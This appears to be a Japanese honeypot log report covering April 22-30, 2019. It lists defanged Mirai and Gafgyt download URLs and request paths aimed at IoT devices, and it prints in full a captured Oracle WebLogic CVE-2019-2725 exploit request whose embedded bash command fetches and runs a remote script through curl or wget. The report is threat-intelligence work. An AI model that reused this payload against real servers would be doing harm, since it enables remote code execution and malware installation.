【ハニーポット簡易分析】Honeytrap簡易分析(249-257日目:4/22-4/30)
令和初のハニーポットの簡易分析となります。IoT製品を狙った攻撃は継続していますが、Oracle WebLogic Server の脆弱性 (CVE-2019-2725)も検知していました。
Honeytrap簡易分析(249-257日目:4/22-4/30)
※80ポートは除く
送信元IPの国別で確認してみたところ、中国付近からの通信が多い傾向でした。
<新規マルウェアダウンロード>
| ポート | マルウェアダウンロード先 | HTTPリクエストパス | 備考 |
| 5555 | hxxp://104[.]168[.]157[.]45/icy[.]sh | POST /UD/?9 | |
| 7001 | 89[.]35[.]39[.]78/2[.]sh | POST /_async/AsyncResponseService | |
| 7001 | hxxp://165[.]227[.]78[.]159/wl[.]php | POST /_async/AsyncResponseService | |
| 7547 | hxxp://31[.]13[.]195[.]251/UqHDZbqr9S[.]sh | POST /UD/act?1 | |
| 8080 | hxxp://165[.]22[.]69[.]188/nope/mpsl[.]daddyscum | POST /tmUnblock.cgi | Mirai |
| 8080 | hxxp://185[.]244[.]25[.]135/nope/mpsl[.]daddyscum | POST /tmUnblock.cgi | Mirai |
| 8080 | hxxp://194[.]147[.]32[.]131/bins/frosty[.]mpsl | POST /tmUnblock.cgi | Mirai |
| 8080 | hxxp://51[.]75[.]35[.]174/all/ntpdd[.]mpsl | POST /tmUnblock.cgi | Mirai |
| 8081 | hxxp://51[.]75[.]35[.]174/all/ntpdd[.]mips | POST /HNAP1/ | Mirai |
| 52869 | hxxp://176[.]56[.]237[.]213/Demon[.]mips | POST /picsdesc.xml | Gafgyt |
| 52869 | hxxp://185[.]52[.]1[.]95/Demon[.]mips | POST /picsdesc.xml | Gafgyt |
| 52869 | hxxp://185[.]70[.]105[.]177/mips | POST /picsdesc.xml | Mirai |
| 52869 | hxxp://185[.]70[.]105[.]63/mips | POST /picsdesc.xml | Mirai |
| 52869 | hxxp://206[.]189[.]237[.]121/real[.]sh | POST /picsdesc.xml | Mirai |
| 52869 | hxxp://23[.]254[.]224[.]39/mips | POST /picsdesc.xml | |
| 52869 | hxxp://5[.]180[.]40[.]102/mppsx | POST /picsdesc.xml |
IoT製品を狙った通信が多いですが、Oracle WebLogic Server の脆弱性 (CVE-2019-2725)を狙った通信も検知しています。
https://www.jpcert.or.jp/at/2019/at190020.html
シェルスクリプトファイルとphpへのアクセスとなっており、前者は現在アクセスできないため、詳細は不明です。後者はページ自体をVTで調査したところ、特にマルウェア判定がなかったため、そのサイトへアクセスした際に脆弱性が存在すると判定しているのではないかと推測します。
なお、実際のペイロードは以下となります。
POST /_async/AsyncResponseService hxxp/1.1
Host: xxx.xxx.xxx.xxx:7001
.User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Upgrade-Insecure-Requests: 1
<soapenv:Envelope xmlns:soapenv="hxxp://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="hxxp://www.w3.org/2005/08/addressing" xmlns:asy="hxxp://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="hxxp://bea.com/2004/06/soap/workarea/"><java version="1.4.0" class="java.beans.XMLDecoder">.. <void class="java.lang.ProcessBuilder">.. <array class="java.lang.String" length="3">.. <void index="0">.. <string>/bin/bash</string>.. </void>.. <void index="1">.. <string>-c</string>.. </void>.. <void index="2">.. <string>(curl -fsSL xxx.xxx.xxx.xxx/2.sh || wget -q -O- xxx.xxx.xxx.xxx/2.sh) | sh</string>.. </void>.. </array>.. <void method="start"/></void>.. </java>..</work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
今回はcurlコマンドおよびwgetコマンドで外部からファイルを取得しようとしているものでした。リモートから任意のコード実行が可能であるため、今後も攻撃は増加していくと思われます。
以上となります。
